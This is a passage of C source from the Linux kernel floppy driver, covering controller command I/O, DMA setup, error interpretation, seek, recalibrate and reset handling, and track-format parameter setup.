cancel_delayed_work(&fd_timeout);
do_floppy = NULL;
cont = NULL;
clear_bit(0, &fdc_busy);
wake_up(&fdc_wait);
}
/* switches the motor off after a given timeout */
static void motor_off_callback(struct timer_list *t)
{
unsigned long nr = t - motor_off_timer;
unsigned char mask = ~(0x10 << UNIT(nr));
if (WARN_ON_ONCE(nr >= N_DRIVE))
return;
set_dor(FDC(nr), mask, 0);
}
/* schedules motor off */
static void floppy_off(unsigned int drive)
{
unsigned long volatile delta;
int fdc = FDC(drive);
if (!(FDCS->dor & (0x10 << UNIT(drive))))
return;
del_timer(motor_off_timer + drive);
/* make spindle stop in a position which minimizes spinup time
* next time */
if (UDP->rps) {
delta = jiffies - UDRS->first_read_date + HZ -
UDP->spindown_offset;
delta = ((delta * UDP->rps) % HZ) / UDP->rps;
motor_off_timer[drive].expires =
jiffies + UDP->spindown - delta;
}
add_timer(motor_off_timer + drive);
}
/*
* cycle through all N_DRIVE floppy drives for disk change testing,
* stopping at current drive. This is done before any long operation, to
* be sure to have up to date disk change information.
*/
static void scandrives(void)
{
int i;
int drive;
int saved_drive;
if (DP->select_delay)
return;
saved_drive = current_drive;
for (i = 0; i < N_DRIVE; i++) {
drive = (saved_drive + i + 1) % N_DRIVE;
if (UDRS->fd_ref == 0 || UDP->select_delay != 0)
continue; /* skip closed drives */
set_fdc(drive);
if (!(set_dor(fdc, ~3, UNIT(drive) | (0x10 << UNIT(drive))) &
(0x10 << UNIT(drive))))
/* switch the motor off again, if it was off to
* begin with */
set_dor(fdc, ~(0x10 << UNIT(drive)), 0);
}
set_fdc(saved_drive);
}
static void empty(void)
{
}
static void (*floppy_work_fn)(void);
static void floppy_work_workfn(struct work_struct *work)
{
floppy_work_fn();
}
static DECLARE_WORK(floppy_work, floppy_work_workfn);
static void schedule_bh(void (*handler)(void))
{
WARN_ON(work_pending(&floppy_work));
floppy_work_fn = handler;
queue_work(floppy_wq, &floppy_work);
}
static void (*fd_timer_fn)(void) = NULL;
static void fd_timer_workfn(struct work_struct *work)
{
fd_timer_fn();
}
static DECLARE_DELAYED_WORK(fd_timer, fd_timer_workfn);
static void cancel_activity(void)
{
do_floppy = NULL;
cancel_delayed_work_sync(&fd_timer);
cancel_work_sync(&floppy_work);
}
/* this function makes sure that the disk stays in the drive during the
* transfer */
static void fd_watchdog(void)
{
debug_dcl(DP->flags, "calling disk change from watchdog\n");
if (disk_change(current_drive)) {
DPRINT("disk removed during i/o\n");
cancel_activity();
cont->done(0);
reset_fdc();
} else {
cancel_delayed_work(&fd_timer);
fd_timer_fn = fd_watchdog;
queue_delayed_work(floppy_wq, &fd_timer, HZ / 10);
}
}
static void main_command_interrupt(void)
{
cancel_delayed_work(&fd_timer);
cont->interrupt();
}
/* waits for a delay (spinup or select) to pass */
static int fd_wait_for_completion(unsigned long expires,
void (*function)(void))
{
if (FDCS->reset) {
reset_fdc(); /* do the reset during sleep to win time;
* if we don't need to sleep, it's a good
* occasion anyway */
return 1;
}
if (time_before(jiffies, expires)) {
cancel_delayed_work(&fd_timer);
fd_timer_fn = function;
queue_delayed_work(floppy_wq, &fd_timer, expires - jiffies);
return 1;
}
return 0;
}
static void setup_DMA(void)
{
unsigned long f;
if (raw_cmd->length == 0) {
int i;
pr_info("zero dma transfer size:");
for (i = 0; i < raw_cmd->cmd_count; i++)
pr_cont("%x,", raw_cmd->cmd[i]);
pr_cont("\n");
cont->done(0);
FDCS->reset = 1;
return;
}
if (((unsigned long)raw_cmd->kernel_data) % 512) {
pr_info("non aligned address: %p\n", raw_cmd->kernel_data);
cont->done(0);
FDCS->reset = 1;
return;
}
f = claim_dma_lock();
fd_disable_dma();
#ifdef fd_dma_setup
if (fd_dma_setup(raw_cmd->kernel_data, raw_cmd->length,
(raw_cmd->flags & FD_RAW_READ) ?
DMA_MODE_READ : DMA_MODE_WRITE, FDCS->address) < 0) {
release_dma_lock(f);
cont->done(0);
FDCS->reset = 1;
return;
}
release_dma_lock(f);
#else
fd_clear_dma_ff();
fd_cacheflush(raw_cmd->kernel_data, raw_cmd->length);
fd_set_dma_mode((raw_cmd->flags & FD_RAW_READ) ?
DMA_MODE_READ : DMA_MODE_WRITE);
fd_set_dma_addr(raw_cmd->kernel_data);
fd_set_dma_count(raw_cmd->length);
virtual_dma_port = FDCS->address;
fd_enable_dma();
release_dma_lock(f);
#endif
}
static void show_floppy(void);
/* waits until the fdc becomes ready */
static int wait_til_ready(void)
{
int status;
int counter;
if (FDCS->reset)
return -1;
for (counter = 0; counter < 10000; counter++) {
status = fd_inb(FD_STATUS);
if (status & STATUS_READY)
return status;
}
if (initialized) {
DPRINT("Getstatus times out (%x) on fdc %d\n", status, fdc);
show_floppy();
}
FDCS->reset = 1;
return -1;
}
/* sends a command byte to the fdc */
static int output_byte(char byte)
{
int status = wait_til_ready();
if (status < 0)
return -1;
if (is_ready_state(status)) {
fd_outb(byte, FD_DATA);
output_log[output_log_pos].data = byte;
output_log[output_log_pos].status = status;
output_log[output_log_pos].jiffies = jiffies;
output_log_pos = (output_log_pos + 1) % OLOGSIZE;
return 0;
}
FDCS->reset = 1;
if (initialized) {
DPRINT("Unable to send byte %x to FDC. Fdc=%x Status=%x\n",
byte, fdc, status);
show_floppy();
}
return -1;
}
/* gets the response from the fdc */
static int result(void)
{
int i;
int status = 0;
for (i = 0; i < MAX_REPLIES; i++) {
status = wait_til_ready();
if (status < 0)
break;
status &= STATUS_DIR | STATUS_READY | STATUS_BUSY | STATUS_DMA;
if ((status & ~STATUS_BUSY) == STATUS_READY) {
resultjiffies = jiffies;
resultsize = i;
return i;
}
if (status == (STATUS_DIR | STATUS_READY | STATUS_BUSY))
reply_buffer[i] = fd_inb(FD_DATA);
else
break;
}
if (initialized) {
DPRINT("get result error. Fdc=%d Last status=%x Read bytes=%d\n",
fdc, status, i);
show_floppy();
}
FDCS->reset = 1;
return -1;
}
#define MORE_OUTPUT -2
/* does the fdc need more output? */
static int need_more_output(void)
{
int status = wait_til_ready();
if (status < 0)
return -1;
if (is_ready_state(status))
return MORE_OUTPUT;
return result();
}
/* Set perpendicular mode as required, based on data rate, if supported.
* 82077 Now tested. 1Mbps data rate only possible with 82077-1.
*/
static void perpendicular_mode(void)
{
unsigned char perp_mode;
if (raw_cmd->rate & 0x40) {
switch (raw_cmd->rate & 3) {
case 0:
perp_mode = 2;
break;
case 3:
perp_mode = 3;
break;
default:
DPRINT("Invalid data rate for perpendicular mode!\n");
cont->done(0);
FDCS->reset = 1;
/*
* convenient way to return to
* redo without too much hassle
* (deep stack et al.)
*/
return;
}
} else
perp_mode = 0;
if (FDCS->perp_mode == perp_mode)
return;
if (FDCS->version >= FDC_82077_ORIG) {
output_byte(FD_PERPENDICULAR);
output_byte(perp_mode);
FDCS->perp_mode = perp_mode;
} else if (perp_mode) {
DPRINT("perpendicular mode not supported by this FDC.\n");
}
} /* perpendicular_mode */
static int fifo_depth = 0xa;
static int no_fifo;
static int fdc_configure(void)
{
/* Turn on FIFO */
output_byte(FD_CONFIGURE);
if (need_more_output() != MORE_OUTPUT)
return 0;
output_byte(0);
output_byte(0x10 | (no_fifo & 0x20) | (fifo_depth & 0xf));
output_byte(0); /* pre-compensation from track
0 upwards */
return 1;
}
#define NOMINAL_DTR 500
/* Issue a "SPECIFY" command to set the step rate time, head unload time,
* head load time, and DMA disable flag to values needed by floppy.
*
* The value "dtr" is the data transfer rate in Kbps. It is needed
* to account for the data rate-based scaling done by the 82072 and 82077
* FDC types. This parameter is ignored for other types of FDCs (i.e.
* 8272a).
*
* Note that changing the data transfer rate has a (probably deleterious)
* effect on the parameters subject to scaling for 82072/82077 FDCs, so
* fdc_specify is called again after each data transfer rate
* change.
*
* srt: 1000 to 16000 in microseconds
* hut: 16 to 240 milliseconds
* hlt: 2 to 254 milliseconds
*
* These values are rounded up to the next highest available delay time.
*/
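/*
 * Worked example: the 1.44M entry above specifies srt == 4000 (usec); at a
 * 500 kbps data rate (scale_dtr == 500) the code below computes
 * 16 - DIV_ROUND_UP(4000 * 500 / 1000, 500) == 12, i.e. a 4 msec step rate.
 */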
static void fdc_specify(void)
{
unsigned char spec1;
unsigned char spec2;
unsigned long srt;
unsigned long hlt;
unsigned long hut;
unsigned long dtr = NOMINAL_DTR;
unsigned long scale_dtr = NOMINAL_DTR;
int hlt_max_code = 0x7f;
int hut_max_code = 0xf;
if (FDCS->need_configure && FDCS->version >= FDC_82072A) {
fdc_configure();
FDCS->need_configure = 0;
}
switch (raw_cmd->rate & 0x03) {
case 3:
dtr = 1000;
break;
case 1:
dtr = 300;
if (FDCS->version >= FDC_82078) {
/* choose the default rate table, not the one
* where 1 = 2 Mbps */
output_byte(FD_DRIVESPEC);
if (need_more_output() == MORE_OUTPUT) {
output_byte(UNIT(current_drive));
output_byte(0xc0);
}
}
break;
case 2:
dtr = 250;
break;
}
if (FDCS->version >= FDC_82072) {
scale_dtr = dtr;
hlt_max_code = 0x00; /* 0==256msec*dtr0/dtr (not linear!) */
hut_max_code = 0x0; /* 0==256msec*dtr0/dtr (not linear!) */
}
/* Convert step rate from microseconds to milliseconds and 4 bits */
srt = 16 - DIV_ROUND_UP(DP->srt * scale_dtr / 1000, NOMINAL_DTR);
if (slow_floppy)
srt = srt / 4;
SUPBOUND(srt, 0xf);
INFBOUND(srt, 0);
hlt = DIV_ROUND_UP(DP->hlt * scale_dtr / 2, NOMINAL_DTR);
if (hlt < 0x01)
hlt = 0x01;
else if (hlt > 0x7f)
hlt = hlt_max_code;
hut = DIV_ROUND_UP(DP->hut * scale_dtr / 16, NOMINAL_DTR);
if (hut < 0x1)
hut = 0x1;
else if (hut > 0xf)
hut = hut_max_code;
spec1 = (srt << 4) | hut;
spec2 = (hlt << 1) | (use_virtual_dma & 1);
/* If these parameters did not change, just return with success */
if (FDCS->spec1 != spec1 || FDCS->spec2 != spec2) {
/* Go ahead and set spec1 and spec2 */
output_byte(FD_SPECIFY);
output_byte(FDCS->spec1 = spec1);
output_byte(FDCS->spec2 = spec2);
}
} /* fdc_specify */
/* Set the FDC's data transfer rate on behalf of the specified drive.
* NOTE: with 82072/82077 FDCs, changing the data rate requires a reissue
* of the specify command (i.e. using the fdc_specify function).
*/
static int fdc_dtr(void)
{
/* If data rate not already set to desired value, set it. */
if ((raw_cmd->rate & 3) == FDCS->dtr)
return 0;
/* Set dtr */
fd_outb(raw_cmd->rate & 3, FD_DCR);
/* TODO: some FDC/drive combinations (C&T 82C711 with TEAC 1.2MB)
* need a stabilization period of several milliseconds to be
* enforced after data rate changes before R/W operations.
* Pause 5 msec to avoid trouble. (Needs to be 2 jiffies)
*/
FDCS->dtr = raw_cmd->rate & 3;
return fd_wait_for_completion(jiffies + 2UL * HZ / 100, floppy_ready);
} /* fdc_dtr */
static void tell_sector(void)
{
pr_cont(": track %d, head %d, sector %d, size %d",
R_TRACK, R_HEAD, R_SECTOR, R_SIZECODE);
} /* tell_sector */
static void print_errors(void)
{
DPRINT("");
if (ST0 & ST0_ECE) {
pr_cont("Recalibrate failed!");
} else if (ST2 & ST2_CRC) {
pr_cont("data CRC error");
tell_sector();
} else if (ST1 & ST1_CRC) {
pr_cont("CRC error");
tell_sector();
} else if ((ST1 & (ST1_MAM | ST1_ND)) ||
(ST2 & ST2_MAM)) {
if (!probing) {
pr_cont("sector not found");
tell_sector();
} else
pr_cont("probe failed...");
} else if (ST2 & ST2_WC) { /* seek error */
pr_cont("wrong cylinder");
} else if (ST2 & ST2_BC) { /* cylinder marked as bad */
pr_cont("bad cylinder");
} else {
pr_cont("unknown error. ST[0..2] are: 0x%x 0x%x 0x%x",
ST0, ST1, ST2);
tell_sector();
}
pr_cont("\n");
}
/*
* OK, this error interpreting routine is called after a
* DMA read/write has succeeded
* or failed, so we check the results, and copy any buffers.
* hhb: Added better error reporting.
* ak: Made this into a separate routine.
*/
static int interpret_errors(void)
{
char bad;
if (inr != 7) {
DPRINT("-- FDC reply error\n");
FDCS->reset = 1;
return 1;
}
/* check IC to find cause of interrupt */
switch (ST0 & ST0_INTR) {
case 0x40: /* error occurred during command execution */
if (ST1 & ST1_EOC)
return 0; /* occurs with pseudo-DMA */
bad = 1;
if (ST1 & ST1_WP) {
DPRINT("Drive is write protected\n");
clear_bit(FD_DISK_WRITABLE_BIT, &DRS->flags);
cont->done(0);
bad = 2;
} else if (ST1 & ST1_ND) {
set_bit(FD_NEED_TWADDLE_BIT, &DRS->flags);
} else if (ST1 & ST1_OR) {
if (DP->flags & FTD_MSG)
DPRINT("Over/Underrun - retrying\n");
bad = 0;
} else if (*errors >= DP->max_errors.reporting) {
print_errors();
}
if (ST2 & ST2_WC || ST2 & ST2_BC)
/* wrong cylinder => recal */
DRS->track = NEED_2_RECAL;
return bad;
case 0x80: /* invalid command given */
DPRINT("Invalid FDC command given!\n");
cont->done(0);
return 2;
case 0xc0:
DPRINT("Abnormal termination caused by polling\n");
cont->error();
return 2;
default: /* (0) Normal command termination */
return 0;
}
}
/*
* This routine is called when everything should be correctly set up
* for the transfer (i.e. floppy motor is on, the correct floppy is
* selected, and the head is sitting on the right track).
*/
static void setup_rw_floppy(void)
{
int i;
int r;
int flags;
unsigned long ready_date;
void (*function)(void);
flags = raw_cmd->flags;
if (flags & (FD_RAW_READ | FD_RAW_WRITE))
flags |= FD_RAW_INTR;
if ((flags & FD_RAW_SPIN) && !(flags & FD_RAW_NO_MOTOR)) {
ready_date = DRS->spinup_date + DP->spinup;
/* If spinup will take a long time, rerun scandrives
* again just before spinup completion. Beware that
* after scandrives, we must again wait for selection.
*/
if (time_after(ready_date, jiffies + DP->select_delay)) {
ready_date -= DP->select_delay;
function = floppy_start;
} else
function = setup_rw_floppy;
/* wait until the floppy is spinning fast enough */
if (fd_wait_for_completion(ready_date, function))
return;
}
if ((flags & FD_RAW_READ) || (flags & FD_RAW_WRITE))
setup_DMA();
if (flags & FD_RAW_INTR)
do_floppy = main_command_interrupt;
r = 0;
for (i = 0; i < raw_cmd->cmd_count; i++)
r |= output_byte(raw_cmd->cmd[i]);
debugt(__func__, "rw_command");
if (r) {
cont->error();
reset_fdc();
return;
}
if (!(flags & FD_RAW_INTR)) {
inr = result();
cont->interrupt();
} else if (flags & FD_RAW_NEED_DISK)
fd_watchdog();
}
static int blind_seek;
/*
* This is the routine called after every seek (or recalibrate) interrupt
* from the floppy controller.
*/
static void seek_interrupt(void)
{
debugt(__func__, "");
if (inr != 2 || (ST0 & 0xF8) != 0x20) {
DPRINT("seek failed\n");
DRS->track = NEED_2_RECAL;
cont->error();
cont->redo();
return;
}
if (DRS->track >= 0 && DRS->track != ST1 && !blind_seek) {
debug_dcl(DP->flags,
"clearing NEWCHANGE flag because of effective seek\n");
debug_dcl(DP->flags, "jiffies=%lu\n", jiffies);
clear_bit(FD_DISK_NEWCHANGE_BIT, &DRS->flags);
/* effective seek */
DRS->select_date = jiffies;
}
DRS->track = ST1;
floppy_ready();
}
static void check_wp(void)
{
if (test_bit(FD_VERIFY_BIT, &DRS->flags)) {
/* check write protection */
output_byte(FD_GETSTATUS);
output_byte(UNIT(current_drive));
if (result() != 1) {
FDCS->reset = 1;
return;
}
clear_bit(FD_VERIFY_BIT, &DRS->flags);
clear_bit(FD_NEED_TWADDLE_BIT, &DRS->flags);
debug_dcl(DP->flags,
"checking whether disk is write protected\n");
debug_dcl(DP->flags, "wp=%x\n", ST3 & 0x40);
if (!(ST3 & 0x40))
set_bit(FD_DISK_WRITABLE_BIT, &DRS->flags);
else
clear_bit(FD_DISK_WRITABLE_BIT, &DRS->flags);
}
}
static void seek_floppy(void)
{
int track;
blind_seek = 0;
debug_dcl(DP->flags, "calling disk change from %s\n", __func__);
if (!test_bit(FD_DISK_NEWCHANGE_BIT, &DRS->flags) &&
disk_change(current_drive) && (raw_cmd->flags & FD_RAW_NEED_DISK)) {
/* the media changed flag should be cleared after the seek.
* If it isn't, this means that there is really no disk in
* the drive.
*/
set_bit(FD_DISK_CHANGED_BIT, &DRS->flags);
cont->done(0);
cont->redo();
return;
}
if (DRS->track <= NEED_1_RECAL) {
recalibrate_floppy();
return;
} else if (test_bit(FD_DISK_NEWCHANGE_BIT, &DRS->flags) &&
(raw_cmd->flags & FD_RAW_NEED_DISK) &&
(DRS->track <= NO_TRACK || DRS->track == raw_cmd->track)) {
/* we seek to clear the media-changed condition. Does anybody
* know a more elegant way, which works on all drives? */
if (raw_cmd->track)
track = raw_cmd->track - 1;
else {
if (DP->flags & FD_SILENT_DCL_CLEAR) {
set_dor(fdc, ~(0x10 << UNIT(current_drive)), 0);
blind_seek = 1;
raw_cmd->flags |= FD_RAW_NEED_SEEK;
}
track = 1;
}
} else {
check_wp();
if (raw_cmd->track != DRS->track &&
(raw_cmd->flags & FD_RAW_NEED_SEEK))
track = raw_cmd->track;
else {
setup_rw_floppy();
return;
}
}
do_floppy = seek_interrupt;
output_byte(FD_SEEK);
output_byte(UNIT(current_drive));
if (output_byte(track) < 0) {
reset_fdc();
return;
}
debugt(__func__, "");
}
static void recal_interrupt(void)
{
debugt(__func__, "");
if (inr != 2)
FDCS->reset = 1;
else if (ST0 & ST0_ECE) {
switch (DRS->track) {
case NEED_1_RECAL:
debugt(__func__, "need 1 recal");
/* after a second recalibrate, we still haven't
* reached track 0. Probably no drive. Raise an
* error, as failing immediately might upset
* computers possessed by the Devil :-) */
cont->error();
cont->redo();
return;
case NEED_2_RECAL:
debugt(__func__, "need 2 recal");
/* If we already did a recalibrate,
* and we are not at track 0, this
* means we have moved. (The only way
* not to move at recalibration is to
* be already at track 0.) Clear the
* new change flag */
debug_dcl(DP->flags,
"clearing NEWCHANGE flag because of second recalibrate\n");
clear_bit(FD_DISK_NEWCHANGE_BIT, &DRS->flags);
DRS->select_date = jiffies;
/* fall through */
default:
debugt(__func__, "default");
/* Recalibrate moves the head by at
* most 80 steps. If after one
* recalibrate we still haven't reached
* track 0, this might mean that we
* started beyond track 80. Try
* again. */
DRS->track = NEED_1_RECAL;
break;
}
} else
DRS->track = ST1;
floppy_ready();
}
static void print_result(char *message, int inr)
{
int i;
DPRINT("%s ", message);
if (inr >= 0)
for (i = 0; i < inr; i++)
pr_cont("repl[%d]=%x ", i, reply_buffer[i]);
pr_cont("\n");
}
/* interrupt handler. Note that this can be called externally on the Sparc */
irqreturn_t floppy_interrupt(int irq, void *dev_id)
{
int do_print;
unsigned long f;
void (*handler)(void) = do_floppy;
lasthandler = handler;
interruptjiffies = jiffies;
f = claim_dma_lock();
fd_disable_dma();
release_dma_lock(f);
do_floppy = NULL;
if (fdc >= N_FDC || FDCS->address == -1) {
/* we don't even know which FDC is the culprit */
pr_info("DOR0=%x\n", fdc_state[0].dor);
pr_info("floppy interrupt on bizarre fdc %d\n", fdc);
pr_info("handler=%ps\n", handler);
is_alive(__func__, "bizarre fdc");
return IRQ_NONE;
}
FDCS->reset = 0;
/* We have to clear the reset flag here, because apparently on boxes
* with level triggered interrupts (PS/2, Sparc, ...), it is needed to
* emit SENSEI's to clear the interrupt line. And FDCS->reset blocks the
* emission of the SENSEI's.
* It is OK to emit floppy commands because we are in an interrupt
* handler here, and thus we have to fear no interference of other
* activity.
*/
do_print = !handler && print_unex && initialized;
inr = result();
if (do_print)
print_result("unexpected interrupt", inr);
if (inr == 0) {
int max_sensei = 4;
do {
output_byte(FD_SENSEI);
inr = result();
if (do_print)
print_result("sensei", inr);
max_sensei--;
} while ((ST0 & 0x83) != UNIT(current_drive) &&
inr == 2 && max_sensei);
}
if (!handler) {
FDCS->reset = 1;
return IRQ_NONE;
}
schedule_bh(handler);
is_alive(__func__, "normal interrupt end");
/* FIXME! Was it really for us? */
return IRQ_HANDLED;
}
static void recalibrate_floppy(void)
{
debugt(__func__, "");
do_floppy = recal_interrupt;
output_byte(FD_RECALIBRATE);
if (output_byte(UNIT(current_drive)) < 0)
reset_fdc();
}
/*
* Must do 4 FD_SENSEIs after reset because of ``drive polling''.
*/
static void reset_interrupt(void)
{
debugt(__func__, "");
result(); /* get the status ready for set_fdc */
if (FDCS->reset) {
pr_info("reset set in interrupt, calling %ps\n", cont->error);
cont->error(); /* a reset just after a reset. BAD! */
}
cont->redo();
}
/*
* reset is done by pulling bit 2 of DOR low for a while (old FDCs),
* or by setting the self clearing bit 7 of STATUS (newer FDCs)
*/
static void reset_fdc(void)
{
unsigned long flags;
do_floppy = reset_interrupt;
FDCS->reset = 0;
reset_fdc_info(0);
/* Pseudo-DMA may intercept 'reset finished' interrupt. */
/* Irrelevant for systems with true DMA (i386). */
flags = claim_dma_lock();
fd_disable_dma();
release_dma_lock(flags);
if (FDCS->version >= FDC_82072A)
fd_outb(0x80 | (FDCS->dtr & 3), FD_STATUS);
else {
fd_outb(FDCS->dor & ~0x04, FD_DOR);
udelay(FD_RESET_DELAY);
fd_outb(FDCS->dor, FD_DOR);
}
}
static void show_floppy(void)
{
int i;
pr_info("\n");
pr_info("floppy driver state\n");
pr_info("-------------------\n");
pr_info("now=%lu last interrupt=%lu diff=%lu last called handler=%ps\n",
jiffies, interruptjiffies, jiffies - interruptjiffies,
lasthandler);
pr_info("timeout_message=%s\n", timeout_message);
pr_info("last output bytes:\n");
for (i = 0; i < OLOGSIZE; i++)
pr_info("%2x %2x %lu\n",
output_log[(i + output_log_pos) % OLOGSIZE].data,
output_log[(i + output_log_pos) % OLOGSIZE].status,
output_log[(i + output_log_pos) % OLOGSIZE].jiffies);
pr_info("last result at %lu\n", resultjiffies);
pr_info("last redo_fd_request at %lu\n", lastredo);
print_hex_dump(KERN_INFO, "", DUMP_PREFIX_NONE, 16, 1,
reply_buffer, resultsize, true);
pr_info("status=%x\n", fd_inb(FD_STATUS));
pr_info("fdc_busy=%lu\n", fdc_busy);
if (do_floppy)
pr_info("do_floppy=%ps\n", do_floppy);
if (work_pending(&floppy_work))
pr_info("floppy_work.func=%ps\n", floppy_work.func);
if (delayed_work_pending(&fd_timer))
pr_info("delayed work.function=%p expires=%ld\n",
fd_timer.work.func,
fd_timer.timer.expires - jiffies);
if (delayed_work_pending(&fd_timeout))
pr_info("timer_function=%p expires=%ld\n",
fd_timeout.work.func,
fd_timeout.timer.expires - jiffies);
pr_info("cont=%p\n", cont);
pr_info("current_req=%p\n", current_req);
pr_info("command_status=%d\n", command_status);
pr_info("\n");
}
static void floppy_shutdown(struct work_struct *arg)
{
unsigned long flags;
if (initialized)
show_floppy();
cancel_activity();
flags = claim_dma_lock();
fd_disable_dma();
release_dma_lock(flags);
/* avoid dma going to a random drive after shutdown */
if (initialized)
DPRINT("floppy timeout called\n");
FDCS->reset = 1;
if (cont) {
cont->done(0);
cont->redo(); /* this will recall reset when needed */
} else {
pr_info("no cont in shutdown!\n");
process_fd_request();
}
is_alive(__func__, "");
}
/* start motor, check media-changed condition and write protection */
static int start_motor(void (*function)(void))
{
int mask;
int data;
mask = 0xfc;
data = UNIT(current_drive);
if (!(raw_cmd->flags & FD_RAW_NO_MOTOR)) {
if (!(FDCS->dor & (0x10 << UNIT(current_drive)))) {
set_debugt();
/* no read since this drive is running */
DRS->first_read_date = 0;
/* note motor start time if motor is not yet running */
DRS->spinup_date = jiffies;
data |= (0x10 << UNIT(current_drive));
}
} else if (FDCS->dor & (0x10 << UNIT(current_drive)))
mask &= ~(0x10 << UNIT(current_drive));
/* starts motor and selects floppy */
del_timer(motor_off_timer + current_drive);
set_dor(fdc, mask, data);
/* wait_for_completion also schedules reset if needed. */
return fd_wait_for_completion(DRS->select_date + DP->select_delay,
function);
}
static void floppy_ready(void)
{
if (FDCS->reset) {
reset_fdc();
return;
}
if (start_motor(floppy_ready))
return;
if (fdc_dtr())
return;
debug_dcl(DP->flags, "calling disk change from floppy_ready\n");
if (!(raw_cmd->flags & FD_RAW_NO_MOTOR) &&
disk_change(current_drive) && !DP->select_delay)
twaddle(); /* this clears the dcl on certain
* drive/controller combinations */
#ifdef fd_chose_dma_mode
if ((raw_cmd->flags & FD_RAW_READ) || (raw_cmd->flags & FD_RAW_WRITE)) {
unsigned long flags = claim_dma_lock();
fd_chose_dma_mode(raw_cmd->kernel_data, raw_cmd->length);
release_dma_lock(flags);
}
#endif
if (raw_cmd->flags & (FD_RAW_NEED_SEEK | FD_RAW_NEED_DISK)) {
perpendicular_mode();
fdc_specify(); /* must be done here because of hut, hlt ... */
seek_floppy();
} else {
if ((raw_cmd->flags & FD_RAW_READ) ||
(raw_cmd->flags & FD_RAW_WRITE))
fdc_specify();
setup_rw_floppy();
}
}
static void floppy_start(void)
{
reschedule_timeout(current_reqD, "floppy start");
scandrives();
debug_dcl(DP->flags, "setting NEWCHANGE in floppy_start\n");
set_bit(FD_DISK_NEWCHANGE_BIT, &DRS->flags);
floppy_ready();
}
/*
* ========================================================================
* here ends the bottom half. Exported routines are:
* floppy_start, floppy_off, floppy_ready, lock_fdc, unlock_fdc, set_fdc,
* start_motor, reset_fdc, reset_fdc_info, interpret_errors.
* Initialization also uses output_byte, result, set_dor, floppy_interrupt
* and set_dor.
* ========================================================================
*/
/*
* General purpose continuations.
* ==============================
*/
static void do_wakeup(void)
{
reschedule_timeout(MAXTIMEOUT, "do wakeup");
cont = NULL;
command_status += 2;
wake_up(&command_done);
}
static const struct cont_t wakeup_cont = {
.interrupt = empty,
.redo = do_wakeup,
.error = empty,
.done = (done_f)empty
};
static const struct cont_t intr_cont = {
.interrupt = empty,
.redo = process_fd_request,
.error = empty,
.done = (done_f)empty
};
static int wait_til_done(void (*handler)(void), bool interruptible)
{
int ret;
schedule_bh(handler);
if (interruptible)
wait_event_interruptible(command_done, command_status >= 2);
else
wait_event(command_done, command_status >= 2);
if (command_status < 2) {
cancel_activity();
cont = &intr_cont;
reset_fdc();
return -EINTR;
}
if (FDCS->reset)
command_status = FD_COMMAND_ERROR;
if (command_status == FD_COMMAND_OKAY)
ret = 0;
else
ret = -EIO;
command_status = FD_COMMAND_NONE;
return ret;
}
static void generic_done(int result)
{
command_status = result;
cont = &wakeup_cont;
}
static void generic_success(void)
{
cont->done(1);
}
static void generic_failure(void)
{
cont->done(0);
}
static void success_and_wakeup(void)
{
generic_success();
cont->redo();
}
/*
* formatting and rw support.
* ==========================
*/
static int next_valid_format(void)
{
int probed_format;
probed_format = DRS->probed_format;
while (1) {
if (probed_format >= 8 || !DP->autodetect[probed_format]) {
DRS->probed_format = 0;
return 1;
}
if (floppy_type[DP->autodetect[probed_format]].sect) {
DRS->probed_format = probed_format;
return 0;
}
probed_format++;
}
}
static void bad_flp_intr(void)
{
int err_count;
if (probing) {
DRS->probed_format++;
if (!next_valid_format())
return;
}
err_count = ++(*errors);
INFBOUND(DRWE->badness, err_count);
if (err_count > DP->max_errors.abort)
cont->done(0);
if (err_count > DP->max_errors.reset)
FDCS->reset = 1;
else if (err_count > DP->max_errors.recal)
DRS->track = NEED_2_RECAL;
}
static void set_floppy(int drive)
{
int type = ITYPE(UDRS->fd_device);
if (type)
_floppy = floppy_type + type;
else
_floppy = current_type[drive];
}
/*
* formatting support.
* ===================
*/
static void format_interrupt(void)
{
switch (interpret_errors()) {
case 1:
cont->error();
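/* fall through */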
case 2:
break;
case 0:
cont->done(1);
}
cont->redo();
}
#define FM_MODE(x, y) ((y) & ~(((x)->rate & 0x80) >> 1))
#define CT(x) ((x) | 0xc0)
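/* FM_MODE() clears bit 0x40 (the MFM flag) of a command byte when the 0x80
 * "FM" bit is set in the floppy's rate field. */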
static void setup_format_params(int track)
{
int n;
int il;
int count;
int head_shift;
int track_shift;
struct fparm {
unsigned char track, head, sect, size;
} *here = (struct fparm *)floppy_track_buffer;
raw_cmd = &default_raw_cmd;
raw_cmd->track = track;
raw_cmd->flags = (FD_RAW_WRITE | FD_RAW_INTR | FD_RAW_SPIN |
FD_RAW_NEED_DISK | FD_RAW_NEED_SEEK);
raw_cmd->rate = _floppy->rate & 0x43;
raw_cmd->cmd_count = NR_F;
COMMAND = FM_MODE(_floppy, FD_FORMAT);
DR_SELECT = UNIT(current_drive) + PH_HEAD(_floppy, format_req.head);
F_SIZECODE = FD_SIZECODE(_floppy);
F_SECT_PER_TRACK = _floppy->sect << 2 >> F_SIZECODE;
F_GAP = _floppy->fmt_gap;
F_FILL = FD_FILL_BYTE;
raw_cmd->kernel_data = floppy_track_buffer;
raw_cmd->length = 4 * F_SECT_PER_TRACK;
if (!F_SECT_PER_TRACK)
return;
/* allow for about 30ms for data transport per track */
head_shift = (F_SECT_PER_TRACK + 5) / 6;
/* a ``cylinder'' is two tracks plus a little stepping time */
track_shift = 2 * head_shift + 3;
/* position of logical sector 1 on this track */
n = (track_shift * format_req.track + head_shift * format_req.head)
% F_SECT_PER_TRACK;
/* determine interleave */
il = 1;
if (_floppy->fmt_gap < 0x22)
il++;
/* initialize field */
for (count = 0; count < F_SECT_PER_TRACK; ++count) {
here[count].track = format_req.track;
here[count].head = format_req.head;
here[count].sect = 0;
here[count].size = F_SIZECODE;
}
/* place logical sectors */
for (count = 1; count <= F_SECT_PER_TRACK; ++count) {
here[n].sect = count;
n = (n + il) % F_SECT_PER_TRACK;
if (here[n].sect) { /* sector busy, find next free sector */
++n;
if (n >= F_SECT_PER_TRACK) {
n -= F_SECT_PER_TRACK;
while (here[n].sect)
++n;
}
}
}
if (_floppy->stretch & FD_SECTBASEMASK) {
for (count = 0; count < F_SECT_PER_TRACK; count++)
here[count].sect += FD_SECTBASE(_floppy) - 1;
}
}
static void redo_format(void)
{
buffer_track = -1;
setup_format_params(format_req.track << STRETCH(_floppy));
floppy_start();
debugt(__func__, "queue format request");
}
static const struct cont_t format_cont = {
.interrupt = format_interrupt,
.redo = redo_format,
.error = bad_flp_intr,
.done = generic_done
};
static int do_format(int drive, struct format_descr *tmp_format_req)
{
int ret;
if (lock_fdc(drive))
return -EINTR;
set_floppy(drive);
if (!_floppy ||
